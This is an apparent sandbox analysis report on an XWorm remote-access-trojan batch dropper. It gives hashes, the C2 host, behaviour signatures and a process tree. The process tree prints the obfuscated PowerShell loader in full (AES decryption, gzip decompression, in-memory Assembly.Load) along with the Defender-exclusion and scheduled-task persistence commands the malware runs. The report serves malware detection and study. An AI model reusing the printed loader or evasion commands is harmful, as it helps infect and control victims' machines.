Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-07-2024 16:14

General

  • Target

    zvgfd-main/Fanta.Live.bat

  • Size

    470KB

  • MD5

    7d81002800c60fb2b26946fc534b8987

  • SHA1

    085d813ec8bf7f691d48a78011938b4a9f24b5e9

  • SHA256

    0a2bc7043be8903606338c714d20d132b877001c2789f368b30dae44aa80d888

  • SHA512

    b16f7ff8bb002954dd2cc6732a122c25b2b66a75bc26800f1b031014a67a5f5f494b7f2ef1457b5cc93cf4d3a6fe62db3c51812ea413f430bdde144a3b06aa8e

  • SSDEEP

    12288:GUMoYDGcH1BKxCob3At/nb5mdrKIegQ25Mf0/FhP:DUD9HHKlb3Qdm5KIA2p

Malware Config

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

Attributes
  • Install_directory

    %Public%

  • install_file

    $phantom~Pub.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 15 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    PID:780
    • C:\Windows\system32\backgroundTaskHost.exe
      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
      2⤵
        PID:2836
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:904
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:952
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:404
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:920
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
              1⤵
                PID:1004
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1064
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1088
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1128
                    • C:\Users\Public\$phantom~Pub.exe
                      C:\Users\Public\$phantom~Pub.exe
                      2⤵
                      • Executes dropped EXE
                      PID:4576
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                    1⤵
                      PID:1208
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1244
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1296
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1336
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1424
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1472
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1496
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1552
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1596
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1644
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1660
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1760
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1768
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1912
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1920
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1948
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2000
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                      1⤵
                                                        PID:2100
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2144
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2232
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2264
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2504
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2524
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2532
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                    1⤵
                                                                      PID:2768
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2792
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2828
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2868
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2896
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3416
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                                PID:3500
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Fanta.Live.bat"
                                                                                  2⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:5016
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZV95zl/ITrrxGrdsAimI2fwOP1zOtvHSQ193ReYto+k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bvkPHp90/lTTmNOsSK9ONg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WrCYx=New-Object System.IO.MemoryStream(,$param_var); $hOItm=New-Object System.IO.MemoryStream; $JSqsS=New-Object System.IO.Compression.GZipStream($WrCYx, [IO.Compression.CompressionMode]::Decompress); $JSqsS.CopyTo($hOItm); $JSqsS.Dispose(); $WrCYx.Dispose(); $hOItm.Dispose(); $hOItm.ToArray();}function execute_function($param_var,$param2_var){ $DVlGZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $euKiJ=$DVlGZ.EntryPoint; $euKiJ.Invoke($null, $param2_var);}$nLwlA = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Fanta.Live.bat';$host.UI.RawUI.WindowTitle = $nLwlA;$lbBUo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nLwlA).Split([Environment]::NewLine);foreach ($BNDvA in $lbBUo) { if ($BNDvA.StartsWith('QpwAfllqiaJfGjCUaDLA')) { $GHscV=$BNDvA.Substring(20); break; }}$payloads_var=[string[]]$GHscV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                    3⤵
                                                                                      PID:1192
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Modifies registry class
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2064
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_318_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_318.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2136
                                                                                      • C:\Windows\System32\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_318.vbs"
                                                                                        4⤵
                                                                                        • Checks computer location settings
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1468
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_318.bat" "
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3768
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZV95zl/ITrrxGrdsAimI2fwOP1zOtvHSQ193ReYto+k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bvkPHp90/lTTmNOsSK9ONg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WrCYx=New-Object System.IO.MemoryStream(,$param_var); $hOItm=New-Object System.IO.MemoryStream; $JSqsS=New-Object System.IO.Compression.GZipStream($WrCYx, [IO.Compression.CompressionMode]::Decompress); $JSqsS.CopyTo($hOItm); $JSqsS.Dispose(); $WrCYx.Dispose(); $hOItm.Dispose(); $hOItm.ToArray();}function execute_function($param_var,$param2_var){ $DVlGZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $euKiJ=$DVlGZ.EntryPoint; $euKiJ.Invoke($null, $param2_var);}$nLwlA = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_318.bat';$host.UI.RawUI.WindowTitle = $nLwlA;$lbBUo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nLwlA).Split([Environment]::NewLine);foreach ($BNDvA in $lbBUo) { if ($BNDvA.StartsWith('QpwAfllqiaJfGjCUaDLA')) { $GHscV=$BNDvA.Substring(20); break; }}$payloads_var=[string[]]$GHscV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                            6⤵
                                                                                              PID:3380
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                              6⤵
                                                                                              • Blocklisted process makes network request
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops startup file
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3160
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:4924
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:2040
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\$phantom~Pub.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:4504
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$phantom~Pub.exe'
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:4100
                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$phantom~Pub" /tr "C:\Users\Public\$phantom~Pub.exe"
                                                                                                7⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1372
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3672
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                      1⤵
                                                                                        PID:5020
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                        1⤵
                                                                                          PID:2588
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:1036
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:4948
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                            1⤵
                                                                                              PID:1416
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                              1⤵
                                                                                                PID:3428

                                                                                              Network

                                                                                              MITRE ATT&CK Enterprise v15

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                Filesize

                                                                                                3KB

                                                                                                MD5

                                                                                                661739d384d9dfd807a089721202900b

                                                                                                SHA1

                                                                                                5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                SHA256

                                                                                                70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                SHA512

                                                                                                81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                Filesize

                                                                                                53KB

                                                                                                MD5

                                                                                                a26df49623eff12a70a93f649776dab7

                                                                                                SHA1

                                                                                                efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                SHA256

                                                                                                4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                SHA512

                                                                                                e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                SHA1

                                                                                                0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                SHA256

                                                                                                342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                SHA512

                                                                                                f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                71c4b1323b5c2b0b3dce79a418170c57

                                                                                                SHA1

                                                                                                f2484755165cc812bd2017c3ff93d7aef8e9f642

                                                                                                SHA256

                                                                                                b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872

                                                                                                SHA512

                                                                                                9048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                944B

                                                                                                MD5

                                                                                                62623d22bd9e037191765d5083ce16a3

                                                                                                SHA1

                                                                                                4a07da6872672f715a4780513d95ed8ddeefd259

                                                                                                SHA256

                                                                                                95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                                                SHA512

                                                                                                9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                944B

                                                                                                MD5

                                                                                                dd1d0b083fedf44b482a028fb70b96e8

                                                                                                SHA1

                                                                                                dc9c027937c9f6d52268a1504cbae42a39c8d36a

                                                                                                SHA256

                                                                                                cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

                                                                                                SHA512

                                                                                                96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                944B

                                                                                                MD5

                                                                                                e5663972c1caaba7088048911c758bf3

                                                                                                SHA1

                                                                                                3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198

                                                                                                SHA256

                                                                                                9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e

                                                                                                SHA512

                                                                                                ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc

                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwwlt11m.oog.ps1

                                                                                                Filesize

                                                                                                60B

                                                                                                MD5

                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                SHA1

                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                SHA256

                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                SHA512

                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                              • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_318.bat

                                                                                                Filesize

                                                                                                470KB

                                                                                                MD5

                                                                                                7d81002800c60fb2b26946fc534b8987

                                                                                                SHA1

                                                                                                085d813ec8bf7f691d48a78011938b4a9f24b5e9

                                                                                                SHA256

                                                                                                0a2bc7043be8903606338c714d20d132b877001c2789f368b30dae44aa80d888

                                                                                                SHA512

                                                                                                b16f7ff8bb002954dd2cc6732a122c25b2b66a75bc26800f1b031014a67a5f5f494b7f2ef1457b5cc93cf4d3a6fe62db3c51812ea413f430bdde144a3b06aa8e

                                                                                              • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_318.vbs

                                                                                                Filesize

                                                                                                124B

                                                                                                MD5

                                                                                                938d87a417886a75241545d7cff1954d

                                                                                                SHA1

                                                                                                e034c00534e33d11af0cb8b25354758942e34572

                                                                                                SHA256

                                                                                                64aa30ff234201942c95e91f055e74dd820c48421b381951b4bceb58916c76c4

                                                                                                SHA512

                                                                                                a303902dbb2c849f7acf4b252fe68af0074f8efa7c7abef14369b6e0f9952682a04a4723226435d0804539c716e46a083d1d7a2074cc8a18e91a71990a769448

                                                                                              • C:\Users\Public\$phantom~Pub.exe

                                                                                                Filesize

                                                                                                442KB

                                                                                                MD5

                                                                                                04029e121a0cfa5991749937dd22a1d9

                                                                                                SHA1

                                                                                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                SHA256

                                                                                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                SHA512

                                                                                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                              • memory/780-107-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1128-111-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1296-104-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1416-100-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1496-113-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1552-109-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1660-114-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1760-106-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1768-99-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/1948-108-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2000-105-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2064-15-0x000002A582640000-0x000002A582648000-memory.dmp

                                                                                                Filesize

                                                                                                32KB

                                                                                              • memory/2064-16-0x000002A582650000-0x000002A5826AA000-memory.dmp

                                                                                                Filesize

                                                                                                360KB

                                                                                              • memory/2064-6-0x000002A5FF670000-0x000002A5FF692000-memory.dmp

                                                                                                Filesize

                                                                                                136KB

                                                                                              • memory/2064-11-0x00007FFC49C20000-0x00007FFC4A6E1000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/2064-13-0x000002A5FF6F0000-0x000002A5FF734000-memory.dmp

                                                                                                Filesize

                                                                                                272KB

                                                                                              • memory/2064-50-0x00007FFC49C20000-0x00007FFC4A6E1000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/2064-12-0x00007FFC49C20000-0x00007FFC4A6E1000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/2064-14-0x000002A5FF810000-0x000002A5FF886000-memory.dmp

                                                                                                Filesize

                                                                                                472KB

                                                                                              • memory/2064-0-0x00007FFC49C23000-0x00007FFC49C25000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                              • memory/2136-32-0x00007FFC49C20000-0x00007FFC4A6E1000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/2136-28-0x00007FFC49C20000-0x00007FFC4A6E1000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/2136-29-0x00007FFC49C20000-0x00007FFC4A6E1000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/2136-27-0x00007FFC49C20000-0x00007FFC4A6E1000-memory.dmp

                                                                                                Filesize

                                                                                                10.8MB

                                                                                              • memory/2144-103-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2504-102-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2588-110-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

